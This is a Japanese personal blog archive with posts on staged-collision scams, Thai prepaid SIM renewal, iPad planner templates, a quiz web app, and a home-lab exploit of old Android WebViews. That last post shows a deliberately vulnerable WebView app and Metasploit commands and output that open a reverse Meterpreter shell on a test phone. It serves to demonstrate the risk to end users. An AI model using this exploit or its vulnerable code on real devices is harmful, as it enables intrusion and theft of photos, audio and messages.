投稿者「admin」のアーカイブ

当たり屋の今昔物語。昔ワイン今スマホ!?

昔から、当たり屋と呼ばれるものにはいろいろありましたが、最近「スマホ」を使った当たり屋が出没しているとか。

私の知っている範囲(経験している範囲?)で、いくつか、紹介してみましょう。

50年前の「当たり屋」

今から50年前にも流行った?「当たり屋」というと、断然車をつかったものが主流だったと記憶しています。

標的の前後に車を寄せておいて前を走っている車がサイドブレーキをかけるというもの。

サイドブレーキだとストップランプが点灯しないので、思わずぶつかってしまうとか。

後ろの車の役割がなんだったのか忘れましたが、たしか前だけじゃなく前後だったような。

確か、前の車に対しては

「ストップランプが点灯しなかった」

とクレームを付けられますが、後ろの車からは、

「それはあなたの車を挟んで後ろ走ってたから関係ない。なんとかしろ!」

となって示談に持ち込まれるとか!?
#すみません。殆ど覚えてません。

ワインの「当たり屋」

それで、今から35年前位ですかね。これは主に海外の話で、「ワインをつかった当たり屋」が流行りました。

ワインなのでアメリカ西海岸あたりか、逆に観光客の多いNYとかの話です。

ワインを持った人にぶつかった拍子にワインを落として割れてしまう。

高級ワインなら当時でも50ドル位はするものなので、「ワイン」に詳しくない(日本人を含む)東洋人が狙われていました。
#今ならそんなこともないでしょうけどね。

割れた瓶の銘柄が判っても高いのか安いのか分かりませんよね。
#今ならググれば一発ですが

または、ワインの中身は安物で、割れた瓶だけは高級ワインのものを使う。

「この値段だという証拠は!?購入時のレシートか、小切手かクレジットカードの利用明細を見せてください。そうしたらなんとかします。じゃなければ今すぐここにPOLICEを呼びましょう」
と言ってみたら、どうなってたんだろ...

スマホの「当たり屋」

スマホの「当たり屋」と聞いたときに、最初に頭に浮かんだのは、「歩きスマホの人にぶつかって、何かが壊れてしまい、その弁償を要求する」だったのですが、いろいろあるようです。

#「歩きスマホ」は、英語では「Texting while walking」だそうな。日本の電車車両内に出てました。

ネットでよく出てくるのが、自転車や自動車に接触したひとが自分のスマホを落としてしまい液晶やガラスが割れたとかでライダーやドライバーに弁償を要求するもの、とか。
#これって自分が「歩きスマホ」ってこと!?

ほぼ女性が狙われるということだそうで、そうなると間違いなく詐欺です。

「ぶつかったという証拠はあるんですよね!ドライブレコーダのデータで確認しますか?」
と言ってみたら、どうなるんだろ...

傾向と対策

こうした詐欺も今ではグローバル化しているようです。先日新聞に、オレオレ詐欺(母さんたすけて詐欺)の米国版が出ていました。「宝くじが当たりました。その手続きのために・・・」というもの。一度対応すると次から次への別な人が現れて手数料?を請求されるのだとか。日本にもそんなのありますよね。その被害者は方々に借金をして最後は自殺したとか。目の見えない方だったそうです。

傾向は、

  • ひとけのない場所で発生する
  • 女性や老人など社会的弱者が標的になる
  • 壊れたものの価値が見た目で判定しにくい

ですね。

対策は、

  • その場の状況を録音しておく。恐喝などあれば特に有用
  • できるだけ周りを巻き込む。男兄弟や夫に連絡する。詐欺ならできるだけ当事者のみと交渉したいでしょうから
  • SNSで検索して、同じような状況がないか調べてみる

などでしょうか。

くれぐれも気を付けてくださいね。

タイリピーターのプリペイドSIMはDtac一択で決まり!?

はじめに

結構前になってしまうのですが、
AISプリペイドSIMの有効期限を月15Bで延長できた!?
という記事を紹介しました。

タイリピータとして、携帯やスマホのプリペイド番号を保持しておくのは、搭乗機が空港について安全ベルト装着のサインが消えた瞬間からの行動に違いが出せるので、重要です。

ここでは、プリペイド番号保持(つまり有効期限延長のことです)の方法に関して、

  • いつでもどこでも簡単に設定できること
    • スマホからアプリを使って設定できます
    • 帰国してからも延長できそうです
  • 安いこと
    • 年24バーツになります

の最新(2018年5月ですが)情報を提供したいと思います。

おまけとして、

  • 複数のSIMの残高(balance)をまとめられること
    • 家族分のSIMの残高(balance)をまとめる
    • 自分用の(データ用と通話用など)複数のSIMの残高(balance)をまとめる

の紹介もしたいと思います。

注意点

  • SIMフリーの「スマホ」が必要です
    • 「携帯」だと後述するアプリが使えないと思われるので注意してください
  • お使いのSIMで200バーツ以上使っていること
    • HAPPYツーリストSIMなら種類によっては即クリアできる条件ですので簡単です
  • 帰国してからの設定を有効にするには、国際ローミングを有効にしていること
    • 帰国する前に設定しておくことが必要です

年間180バーツが年間24バーツと、格段にコストが下がりました。

やり方

ひとことでいうと「スマホにDtacアプリをインストールしてちょこちょこやる」です。

DtacアプリはPlayストアやAppleストアで簡単に探せます(日本でも)。
ただ、(日本でもタイでも)DtacのSIMを刺した状態でないと、起動したときログインが必要になりますので、極力タイにいるときに設定することを勧めます。

ちょっと前には考えられなかったアプリです。いつもSMSによるコード送信でしたので。PCでいうCUIとGUIの違いのような...
ネットにも、公式ページ以外にはほとんど情報もなく、アプリの画像も出てこない状態でした。

これから紹介する有効期限延長サービス(Day Give-away Service)や残高移行サービス(Balnce Transfer Service)のアプリ画像もネットでは見たことがありませんでしたが、タイ語のサイトなどに出ているんでしょうかね。

有効期限延長サービス(Day Give-away Service)

アプリを立ち上げた直後はこんな風です。

下のメニュの中のPackegeが選択されている状態のようです。

このメニュの右端にあるOtherを選択すると、

電話番号が表示され、国際ローミング設定やらアプリ設定やらが出てきますが、Jaideeを選択します。

上から2番目にあるDay-GiveAway-Serviceを選択します。


60日、90日、180日のうち、180日(12バーツ)を申し込んだあとに来たSMSです。

残高移行サービス(Balnce Transfer Service)

私の場合これ良く使います。タイ滞在中はデータ用SIMと通話用SIMを併用していて、データ用SIMの電話番号は保持しても仕方ないので、帰国直前に残高を通話用SIMへ移行しています。

上から3番目にあるBalance-Transfer-Serviceを選択します。

残高移行先の電話番号と移行金額を入れて申し込みます。

受け付けたことをSMSで知らせてくれます。アプリでも確認できます。

※手数料が2バーツ掛かりますので注意してください

国際ローミングサービス(International Roaming Service)

上の設定もそうですが、通話(電話)アプリから特殊なコードをSMS送信することで設定できます。

通話(電話)アプリのダイヤルPADで以下をダイヤルする

*118*9#

アプリでも設定できそうです。「できそうです」というのは歯切れの悪い言い方ですが、
私自身はSMSによる設定で済ませてしまいました。

上にも出てきたOtherを選択した画面です。

この中にある、International-Serviceを選択します。

japanを選択すれば国際ローミングサービスの設定ができるようです(未確認)。

あとがき

使用言語がタイ語と英語ともうひとつ(よくわからない言語です)あるようです。

内容は簡単なのでこのページを参考に設定してみてください。
#「Jaidee」は「親切、優しい」の意味だそうです。ハートのアイコンですもんね!

以上です。

実験してみました!Android 4.2.x以下のAndroid端末(スマホやタブレット)は本当にやばいです!

ここのリンクにもあるように、Android 4.2.x以下のAndroid端末のAndroid全端末に占める割合は約50%です。50%のAndroid端末の台数は膨大な数になります。数億台?そしてこれら50%の端末に潜在する可能性のある脆弱性(*1)について実験してみました。
結果は、手近にあったAndroid端末4台中2台に脆弱性が残っており、「端末に保存されている画像入手は当たり前。アプリに対するパーミッションによっては端末内蔵カメラによるスナップ撮影も可能」という結果になりました。

*1:Attacks on Android WebViews

どういう端末が危ないか

1.Android 4.2.x(APIは17)以下のOSを搭載するAndroid端末
2.WebViewクラスを使用したアプリをインストールして起動
3.インタネットへのアクセスを許可

これだけで、端末内に保存されている写真や音声やSMSを抜かれる可能性があります。

さらに、

4.カメラ、マイク、連絡先、SMSなどへのアクセスを許可

などしていると、場合によっては内蔵カメラで写真を撮られたり、マイクで録音されたり、SMS送信されたりしてしまう可能性があります。

なので上記2のWebViewクラスを使用したアプリが、「悪意のある」アプリの場合本当にやばいと思われます

実験内容

1.アプリ作成
Java言語でWebViewクラスを宣言した50行ほどのコードにインタネットアクセス許可をつけただけのスマホアプリ(vulnWebView.apk)を作成。またカメラ等へのアクセスを実験するため、カメラ、マイク、SMS、カレンダ、連絡先へのパーミッションをつけた別バージョンのスマホアプリ(vulnWebViewAll.apk)も作成

2.侵入ホストにて端末からのアクセスを待機
侵入テスト用Frameworkである「Metasploit」から脆弱性をついたExploitを使用して、Android端末上で上記スマホアプリが実行されるのを待機

3.端末上でアプリ実行
Android端末に上記スマホアプリをインストールして実行。(HOMEPAGEやSDCARDや共有フォルダ経由などなんでもよい)ダウンロードしてインストール

4.侵入ホストより侵入
脆弱性の条件が合って接続できれば、画像や音声等のデータを入手してみるさらに端末内蔵のカメラでスナップ撮影。マイクからの録音も。

ターゲット環境

・HTC Butterfly J:os4.1.1
・SonyTabletS:os4.0.3
・GalaxyS3Progre:os4.1.2
・ArrowsNX_F_01F:os4.2.2
・全端末はLAN接続

侵入ホスト環境

・VMWare(7.1.0 build-2496824) on Win7 Home Premium Edition
・Kali Linux3(CD-ROM)でインストール後UpdateおよびUpgrade完了。GitHubによる最新化はしていない
・Metasploit Framework Version: 4.11.3-2015062101
(msfconsoleのバージョン表示から)
・ターゲット端末と同じLANに接続

WebViewクラス使用アプリの作成

GitHubに実験用のJavaソース(というよりproject)が公開されており、それを使って実験してみました。ただそのままではうまく動作せず、下記に従いコードを変更しました。

変更点1:LoadUrlの呼び出しではPORTを陽に指定する必要があること
変更点2:処理途中にRedirectがありその場合にWebViewではなく通常のブラウザが呼ばれてしまいうまく動作しない。それを防ぐコードを追加したこと
変更点3:侵入端末への接続情報、すなわちIPアドレス、ポート番号、およびURIをアプリから指定できるようにしてあります。

package com.krasavkana.vulnwebview;

import android.os.Bundle;
import android.annotation.SuppressLint;
import android.app.Activity;
import android.view.Menu;
import android.view.View;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import android.widget.Button;
import android.widget.EditText;

@SuppressLint("SetJavaScriptEnabled")
public class MainActivity extends Activity {

private static EditText edittext1;
private static EditText edittext2;
private static EditText edittext3;
private static WebView myWebView;

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);

final Button button = (Button) findViewById(R.id.button1);

// set LHOST 192.168.1.30
edittext1 = (EditText) findViewById(R.id.edittext1);
// set SVRPORT 8080
edittext2 = (EditText) findViewById(R.id.edittext2);
// set URIPATH /aaaaaaaa
edittext3 = (EditText) findViewById(R.id.edittext3);

myWebView = (WebView) findViewById(R.id.webView1);

// not a good idea!
WebSettings webSettings = myWebView.getSettings();
webSettings.setJavaScriptEnabled(true);

// terrible idea!
myWebView.addJavascriptInterface(new WebAppInterface(this), "Android");

myWebView.setWebViewClient(new WebViewClient(){
@Override
public boolean shouldOverrideUrlLoading(WebView view, String url) {
return super.shouldOverrideUrlLoading(view, url);
}
});

// woot.
//myWebView.loadUrl(edittext.getText().toString());

button.setOnClickListener(new View.OnClickListener() {
public void onClick(View v) {
// Perform action on click
loadUrl();
}
});

}

@Override
public boolean onCreateOptionsMenu(Menu menu) {
// Inflate the menu; this adds items to the action bar if it is present.
getMenuInflater().inflate(R.menu.main, menu);
return true;
}

private void loadUrl() {
String uri="http://"+edittext1.getText().toString()+":"+edittext2.getText().toString()+edittext3.getText().toString();
myWebView.loadUrl(uri);
// myWebView.reload();
}

}

実験結果

・HTC Butterfly J(os4.1.1):侵入NG(条件のうちvuln_testがFalseで合わないらしい)
・SonyTabletS(os4.0.3):侵入NG(ただし条件は合うようだ)
・GalaxyS3Progre(os4.1.2):侵入OK。カメラへのアクセス許可があればスナップ撮影が可能
・ArrowsNX_F_01F(os4.2.2):侵入OK。カメラへのアクセス許可があってもスナップ撮影は不可。
マイクによる音声入力は長いもの(60秒)は不可

以下は、GalaxyS3Progreに侵入テストしたときのコンソール画面です。

root@kali:~# msfconsole

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt

Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use android/browser/webview_addjavascriptinterface
msf exploit(webview_addjavascriptinterface) > set LPORT 192.168.1.30
LPORT => 192.168.1.30
msf exploit(webview_addjavascriptinterface) > set URIPATH /aaaaaaaa
URIPATH => /aaaaaaaa
msf exploit(webview_addjavascriptinterface) > set VERBOSE true
VERBOSE => true
msf exploit(webview_addjavascriptinterface) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.30:4444 
[*] Using URL: http://0.0.0.0:8080/aaaaaaaa
[*] Local IP: http://192.168.1.30:8080/aaaaaaaa
[*] Server started.
msf exploit(webview_addjavascriptinterface) > 
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - No cookie received, resorting to headers hash.
[*] 192.168.1.108    webview_addjavascriptinterface - Gathering target information.
[*] 192.168.1.108    webview_addjavascriptinterface - Sending HTML response.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Info receiver page called.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Received cookie 'oZbIEOhlGk'.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Received sniffed browser data over POST: 
{"os_name"=>["Android"], "os_vendor"=>["undefined"], "os_device"=>["undefined"], "ua_name"=>["Safari"], "ua_ver"=>["4.0"], "arch"=>["armle"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["null"], "vuln_test"=>["true"]}.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Received cookie 'oZbIEOhlGk'.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Serving exploit to user with tag oZbIEOhlGk
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Setting target "oZbIEOhlGk" to :tried.
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Comparing requirement: source=script vs source=script
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Comparing requirement: os_name=(?-mix:^(?:Google )?Android) vs os_name=Android
[*] 192.168.1.108    webview_addjavascriptinterface - 192.168.1.108    webview_addjavascriptinterface - Comparing requirement: vuln_test=true vs vuln_test=true
[*] 192.168.1.108    webview_addjavascriptinterface - Serving armle exploit...
[*] Sending stage (45338 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 192.168.1.108:44195) at 2015-06-28 15:49:42 -0700

msf exploit(webview_addjavascriptinterface) > sessions

Active sessions
===============

  Id  Type                      Information  Connection
  --  ----                      -----------  ----------
  1   meterpreter java/android   @ localhost  192.168.1.30:4444 -> 192.168.1.108:44195 (192.168.1.108)

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: /data/data/com.krasavkana.vulnwebview
==============================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  11768  fil   2015-06-28 15:49:41 -0700  abaeJ.dex
40666/rw-rw-rw-   4096   dir   2015-06-28 15:49:37 -0700  cache
40666/rw-rw-rw-   4096   dir   2015-06-28 15:49:37 -0700  databases
40444/r--r--r--   4096   dir   2015-06-28 15:49:14 -0700  lib

meterpreter > pwd
/data/data/com.krasavkana.vulnwebview
meterpreter > cd ..
meterpreter > pwd
/data/data

実験で使ったAPKファイル

掲載不要かもしれませんが、自分でも実験したり侵入テストしてみたりしたい方のために、今回作成したWebView使用アプリのAPKファイルを置いておきます。IPアドレス、ポート、サーバのURIを変更できる設計にしましたので、ここで実験したことが再現できると思います。ただくれぐれもLAN等閉鎖されたところで実験してください。

インタネットアクセスのみのVunWebView.apk
インタネットアクセスの他カメラ、マイク、カレンダ、連絡先、SMSへのアクセスを許可するVunWebView.apk

因みに、GooglePlayに出している(*2)Androidアプリが数点あるのですが、そのうち1点がWebViewクラスを使用しています。心配になったので、LoadUrlメソッドで呼び出しているURIに、ここで使った侵入ホストを指定して実験してみましたが、脆弱性がつけなかったのか侵入できませんでした。理由はaddJavascriptInterfaceメソッドを使っていないからだと思っています。

*2:実はつい最近ですが、GooglePlayから削除されていることが判明しました。Googleからデベロッパ宛にPolicy変更等の通知が来るのですが、暫くの間見れないことがあって、その間に期限切れになり、結果「削除」になってしまったようです。

他の脆弱性について

今回の実験で使用した脆弱性の他にも、さまざまな脆弱性が発見されており、アンチウイルスのメーカ等と侵入者とのいたちごっこが続いています。

私たちエンドユーザとしては、

・OSはできるだけUpdateをすること、
・怪しいアプリはインストールしないこと、
・重要な情報は端末に残さないか暗号化しておく、

などができ得る対策ですが、十分に気をつけましょう。

関連する記事・ページ

お世話になったリンク

Attacks on Android WebViews
rapid7/metasploit-framework
WebViewのリダイレクト時のブラウザ起動防止
以上です。

iPad手書きアプリ「Noteshelf」向け能率手帳風テンプレートを作ってみました

膨大な数のiPadアプリの中でも、Must-Haveなものの一つとして定評のある手書きアプリ「Noteshelf」。とにかく書き心地がよくて、本当に癖になります。でも、ここ一年程セキュリティーの厳しい職場だったためスマホやタブレットなど録音や録画、撮影が可能なデバイスは休止して所謂システム手帳を使っていました。能率手帳Bindexから出ているDiaryリフィルをひさしぶりに手に入れて使ってみましたがこれが素晴らしい。「Noteshelf」に戻れなくなるんじゃないかと考えた程でした。

そこで「Noteshelf」と「能率手帳」風Diaryの好いとこ取りをしようと、能率手帳風「紙のスタイル」の元データをHTML5+CSSで作成してみました。

標準の「紙のスタイル」の中にも「日程表」が提供されていますが

「日程表」という「紙のスタイル」が元々提供されており、これでも大丈夫そうですが、やはり使い慣れたものがいいですよね。HTML5+CSSで作成してみました。

能率手帳風Diary表示ページはこちら

スリム版はこちら。1ページにメモとスケジュールを収めました

スリム版V2はこちら。複数日のPDF出力のため基準日と日数を指定できるようにしました
スリム版V2の2018年版はこちら。2018年元日から365日分表示します。印刷にPrimoPDF等のPDF出力アプリを使えばNoteshelfで使えます
スリム版V2の当月分はこちら。ただし31日分でるので変更するときはURLのパラメータを変えてください

月間目標版はこちら。2015年と2016年があります

日付部分のみ一週間分表示はこちら

左上にある日付の場所をタッチすると日付選択ができ、右上や左上にある日付に関連する表示を変更してくれます。能率手帳風Diaryの左ページ(メモ用)と右ページ(スケジュールやチェックリスト)を一度に表示します。iPad等で画像を取り込むときは、左右のページをそれぞれ取り込むか、横向き使用を想定して一度に取り込むかします。

iPadでの表示テストは初代iPad-miniを使用しており、新iPad-miniを含み歴代の標準サイズのiPadでは試していません。解像度の関係で表示結果がまちまちになるかも知れません。

iPad手書きアプリ「Noteshelf」への取り込み方法

ステップ1:iPadで上記ページにアクセスしてDiaryページを表示する

ステップ2:電源ボタン+ホームボタンの同時ONでDiaryページの画像を保存する

ステップ3:「Noteshelf」アプリを起動して

ステップ4:「ノートの新規作成」(書棚モードの右隅にある「+」を丸で囲んだアイコンをタッチ)

ステップ5:「ノートをカスタマイズ」の上段を「すべてのスタイル」から「カスタム」に変更

ステップ6:スタイルの新規追加でステップ2で保存した画像を設定する

カスタム「紙のスタイル」にはダイナミック表示の機能がない

カスタムスタイルを作ったのはいいのですが、自分であれこれ使ってみて、カスタム「紙のスタイル」にいちいち登録して使うのは根気が必要だと感じました。もちろん、日付部分を空にして手書きで入れればいいのですが、それだと「日程表」と変わらなくなり、ちょっとつまらない。

ストアで探せばいいのかな?

やはりダイナミックな「紙のスタイル」というのは原理的に難しいのでしょうね。しばらく使ってみていろいろ工夫してみようと思います。

DropboxなどからPDFを読み込む方法もあるようです

Noteshelfではテンプレートを使ってノートを作成する方法のほかに、DropboxなどからPDFを読み込む方法があるようです。これだと複数ページにわたるテンプレートのように使うことができますね。
スリム版をH31年(西暦2019年)分でまとめたPDFはこちら
スリム版をH31年(西暦2019年)会計年度分でまとめたPDFはこちら
スリム版をH31年第1四半期(西暦2019年Q1)分でまとめたPDFはこちら
スリム版をH31年第2四半期(西暦2019年Q2)分でまとめたPDFはこちら
スリム版をH31年第3四半期(西暦2019年Q3)分でまとめたPDFはこちら
スリム版をH31年第4四半期(西暦2019年Q4)分でまとめたPDFはこちら
スリム版をH32年(西暦2020年)分でまとめたPDFはこちら
スリム版をH32年(西暦2020年)会計年度分でまとめたPDFはこちら(400日分あります)
スリム版をH33年(西暦2021年)分でまとめたPDFはこちら
スリム版をH33年(西暦2021年)会計年度分でまとめたPDFはこちら(400日分あります)
スリム版をH34年(西暦2022年)分でまとめたPDFはこちら

関連する記事・ページ

お世話になったリンク

バックアップのためのリンク

スリム版をH30年(西暦2018年)分でまとめたPDFはこちら
スリム版をH29年(西暦2017年)分でまとめたPDFはこちら
以上です。

流行りのフレームワークで作りました!「暗記の井戸クラウド」をβリリース

Javascript(jQuery)のMVCフレームワークというのか、いわゆるBackbone.jsと、アプリケーションサーバが不要なCakePHPを組み合わせた「暗記の井戸クラウド」をβリリースします。

スマホ版
タブレット版
PC版

※上記URLの最初にある「krapsiup」は、「quizpark」から来ています。お気づきになられた方もいらっしゃるかと思いますが、「park」を並べ替えると「krap」に、「quiz」を鏡面でみる(裏から眺める?)と「siup」になります

暗記の井戸シリーズの中でコード量が圧倒的に少なくなったにも関わらず、結構いろいろ拡張できそうな予感もあり、面白いと感じています。

とりあえずは、本サイトで紹介している「暗記データ例」を、PCでもスマホでも同じデータをいつでもどこでも参照できるようにしました。例えオフラインになっても最後にアクセスしたデータが残ってますので、気合を入れて暗記に集中できます。

画面は3種類あります

BOX画面、LIST画面、QUIZ画面の3種類。他に各種設定や編集画面がありますが、主なものは左記の3つです。

  • [BOX画面]メールボックスのリストような画面で、クイズ(問題)の集まりのリストです。
  • [LIST画面]メールボックスのような画面で、クイズ(問題)の集まりです。
  • [QUIZ画面]メッセージのような画面で、、クイズ(問題)の詳細です。画面の上半分にクイズ(問題)、下半分にアンサー(解答)、がそれぞれ表示されます

タイムトライアル機能を入れました

タイムトライアル機能?を入れてみました。画面の上半分をタッチ(もしくはクリック)すると機能をON/OFFできます。
※タイムトライアルの時間を変更できます。「BOX画面」下の「Settings」から「TimeTrialInterval」の数字を変更します。単位は秒数です(初期値は10)

「QUIZ画面」の前後移動は画面のタッチで

「QUIZ画面」の下半分の左側をタッチするとひとつ前の問題の「QUIZ画面」に移動します。右半分をタッチするとひとつ後の問題の「QUIZ画面」に移動します

※前後への移動でなく任意の問題の「QUIZ画面」に移動したい場合には、一旦LIST画面に戻ってから問題を選択します

関連する記事・ページ

暗記データ例 | 暗記の井戸HTML5
あなた方は神です!?古いCakePHPの導入で先人の知恵を拝借

お世話になったリンク

[CakePHP] JSON出力時にstring型をint型に戻す | XPages、ロータスノーツ・ドミノのモバイル・WEBアプリの開発・相談ならKTrick LLC.
AJAX ? CakePHP Cookbook v1.3 documentation
CakePHPでビューやレイアウトを使わない方法。 | Wataame Frog
Cakephp 1.3系でBackbone.jsの生成したjsonを受け取る。 – Qiita [キータ]

以上です。